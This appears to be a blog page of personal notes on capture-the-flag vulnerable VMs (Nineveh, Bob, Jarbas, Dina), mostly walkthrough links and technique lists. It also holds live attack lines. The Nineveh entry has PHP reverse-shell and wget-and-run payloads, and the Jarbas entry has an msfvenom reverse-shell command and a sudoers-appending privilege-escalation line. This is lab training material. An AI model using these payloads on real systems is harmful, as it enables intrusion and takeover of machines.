
Posts

48 VM HTB Nineveh

Walkthru:
A. https://v3ded.github.io/ctf/htb-nineveh.html [hydra brute force www, searchsploit phpLiteAdmin 1.9, hydra brute force https where username is irrelevant but just required to complete the command, php reverse shell, create a database in phpLiteAdmin and table, directory traversal, chkrootkit privilege escalation bug, port knocking, strings to extract key from png file]

Notes: Unable to test it since the VM had static IP. Read Walkthru.
Make our own .txt backdoor file inside /var/www/html with <?php $sock=fsockopen("YOUR IP",1234);exec("/bin/sh -i <&3 >&3 2>&3");?> as the content.
Change Database and add a table inside called shell, select 1 field: name the field whatever we wish, set it as text type, put <?php system("wget YOURIP/shell.txt -O /tmp/shell.php; php /tmp/shell.php"); ?> into the default value & click create. This should create a new table with our exploit...

47 VM Bob 1.0.1

Walkthru:
A. http://www.hackingarticles.in/hack-the-bob-1-0-1-vm-ctf-challenge/ [webshell, robots.txt, reverse shell, combining two o/s commands using && and ||, hidden content/information, spawning a python shell, ssh on non-default port, search for txt file, password in text file, gpg file where the key is the first letters of the lines of a file]
B. https://dangwasec.wordpress.com/2018/03/20/ctf-bob-1-0-1-walkthrough/ [burp]
C. https://hackso.me/bob-1.0.1-walkthrough/ [PGPCrack-NG is a program designed to brute-force symmetrically encrypted PGP files; not useful here]

Notes: file notes.sh
#!/bin/bash
clear
echo "-= Notes =-"
echo "Harry Potter is my faviorite"
echo "Are you the real me?"
echo "Right, I'm ordering pizza this is going nowhere"
echo "People just don't get me"
echo "Ohhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh <sea santy here>"
echo "Cucumber"
echo "Rest now your eyes are slee...

45 VM : CTF: Jarbas 1

Notes: https://d7x.promiselabs.net/2018/07/26/ctf-jarbas-1-vulnhub-ctf-walkthrough/ [website linked to external website, jenkins, dirb using -x option to search for html and php files, unhash pwd, run shell via jenkins web app, msfvenom code base64 encode/decode, privilege escalation adding user in sudo file by adding in sudoer file]

Walkthru: Reverse shell steps...
1. msfvenom -a x64 -p linux/x64/shell_reverse_tcp lhost=192.168.117.4 lport=443 -e x86/shikata_ga_nai -f elf -b '\x00' > shell.bin
2. cat shell.bin | base64
3. echo "replace_it_with_the_content_of_the_shell.bin" | base64 -d > /tmp/shell.bin
   chmod +x /tmp/shell.bin
   /tmp/shell.bin

echo "echo 'jenkins ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers" >> /etc/script/CleaningScript.sh → where CleaningScript.sh is the file that runs via the crontab

40 VM : Dina 1.0.1

Walkthru:
A. http://touhidshaikh.com/blog/?p=475 [zip2john, burp proxy change user agent vulnerability, php reverse shell]

Notes: This VM also has another vulnerability, https://www.exploit-db.com/exploits/42003/, which I was able to use to run the uname -a and id commands in the filename but couldn't do anything beyond that. Unable to run reverse shell.
A. Imported the file successfully but do not see any output when command is run via user agent field. No output is shown.